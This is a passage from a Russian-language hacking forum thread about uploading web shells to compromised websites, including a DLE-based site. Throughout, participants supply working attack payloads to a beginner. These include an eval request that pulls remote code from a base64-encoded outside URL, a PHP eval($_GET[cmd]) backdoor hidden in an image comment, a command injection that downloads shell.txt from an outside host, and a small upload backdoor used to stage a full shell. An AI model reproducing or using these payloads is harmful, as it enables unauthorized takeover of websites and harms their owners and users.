Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. Martyn911

    Martyn911 New Member

    Joined:
    10 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, прочитал статью по заливке шеллов, приступил к практике и после заливки мини шелла процесс заморозился.
    Сайт на дле, /?cmd=phpinfo(); выводится, а все остальное предложенное в топике не работает(Hacking attempt!), помогите кто-нибудь до конца разобраться в этом не легком деле, буду очень Вам благодарен за помощь :)

    стукните кто шарит в личку
     
    #141 Martyn911, 3 Jun 2013
    Last edited: 3 Jun 2013
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    попробуй такой запрос

    Code:
    eval(file_get_contents(base64_decode (aHR0cDovL3pvcmdlZS1ydS5wLmh0L2ZpeDEudHh0)))%3b
     
  3. Martyn911

    Martyn911 New Member

    Joined:
    10 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    огромное спасибо, заиклудился, а можно без искажений браузера показать что такое %3b (учусь, все надо знать :p )?
     
  4. sovok

    sovok Member

    Joined:
    23 Mar 2011
    Messages:
    47
    Likes Received:
    5
    Reputations:
    0
    подкиньте, плиз, гифку с комментом <?php eval($_GET[cmd]); ?>
     
  5. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    а если например открыть gif в том же notepad и дописать в конец <?php eval($_GET[cmd]); ?> то работает тока если в папке есть htaccess с строкой AddType application/x-httpd-php .gif . А если через exif код добавить будет без htaccess работать ?
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    А как его сервер сможет обработать если он скрипты читает как скрипты, а картинку, как картинку по расширениям... нет!
     
    _________________________
  7. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    сам сделать же можешь
    http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom%20-%20A%20JPEG%20Comment%20Editor.htm
    перетаскивай картинку на ехе и пиши любой коммент хоть шелл
    [​IMG]
     
    _________________________
  8. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    народ выручайте, какие есть варианты заливки через такой бэкдор, кроме качалок curl, wget и тд?
     
    #148 dmjROV, 18 Oct 2014
    Last edited: 18 Oct 2014
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    echo "<? shell ?>" >>shell.php
     
    _________________________
    1 person likes this.
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ?cmd=echo "<?php file_put_contents('shell.php',file_get_contents('h ttp://site.com/shell.txt')); ?>" > 1.php
    site/1.php
    site/shell.php
     
    _________________________
  11. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    что то не катит, вообще только заливщиками получается, другими способами описываемые тут, не получается, что я не так делаю, понять не могу.

    почему то такой способ не катит.
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    если не ошибаюсь allow_url_fopen должен быть включен для функции file_get_contents(); посмотри это в phpinfo();
     
    _________________________
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    таким же образом залей вот этот код
    PHP:
    <?php move_uploaded_file($_FILES['f']['tmp_name'],'./'.basename($_FILES['f']['name'])); ?>
    <form method="post" enctype="multipart/form-data"><input type="file" name="f"><input type="submit" value="ok"></form>
    и из него уже лей полноценный шелл
     
    _________________________
  14. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Каким образом? Через качалки? Мне как раз нужны альтерантивные варианты заливки, когда качалки не работают, например, через такой или подобный ему код:
    вообщем, с помощью обычной записи в файл, вот у меня и вопрос, с помощью passthru возможно реализовать такое?
     
    #154 dmjROV, 19 Oct 2014
    Last edited: 19 Oct 2014
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    тебе по полочкам вопрос разжували, а ты тролить начинаешь!!!! удачи тебе в изучение вопросов!!!
     
    _________________________
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    ?cmd=echo -e "<? move_uploaded_file($_FILES['f']['tmp_name'],'./'.basename($_FILES['f']['name'])); ?> \n<form method='post' enctype='multipart/form-data'><input type='file' name='f'><input type='submit' value='k'></form>" >> 2.php
    после по адресу /2.php, оттуда лей шелл.
     
    _________________________
    2 people like this.
  17. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    с тобой все нормально?
    никого я не тролю, даже больше скажу, я реально профан в этой теме и всем кто отписался тут, благодарен.
     
  18. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    спасибо за рабочий вариант, файл заливается, но в внутри вот это
    аплоадер соответственно не работает, как то не коректно он создает его.
     
    #158 dmjROV, 19 Oct 2014
    Last edited: 19 Oct 2014
  19. TADIAMOND

    TADIAMOND Member

    Joined:
    19 Feb 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    6
    норобуй в начале добавить вместо <? --- <?php такой открывающий тег! если в исходном коде увидишь опять код пхп, то в папке отключен пхп! тогда тут влообще по другому надо действовать!
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    при переходе на файл открывается как плэйн-текст или что? дай сюда вывод phpinfo.
     
    _________________________
    #160 yarbabin, 19 Oct 2014
    Last edited: 19 Oct 2014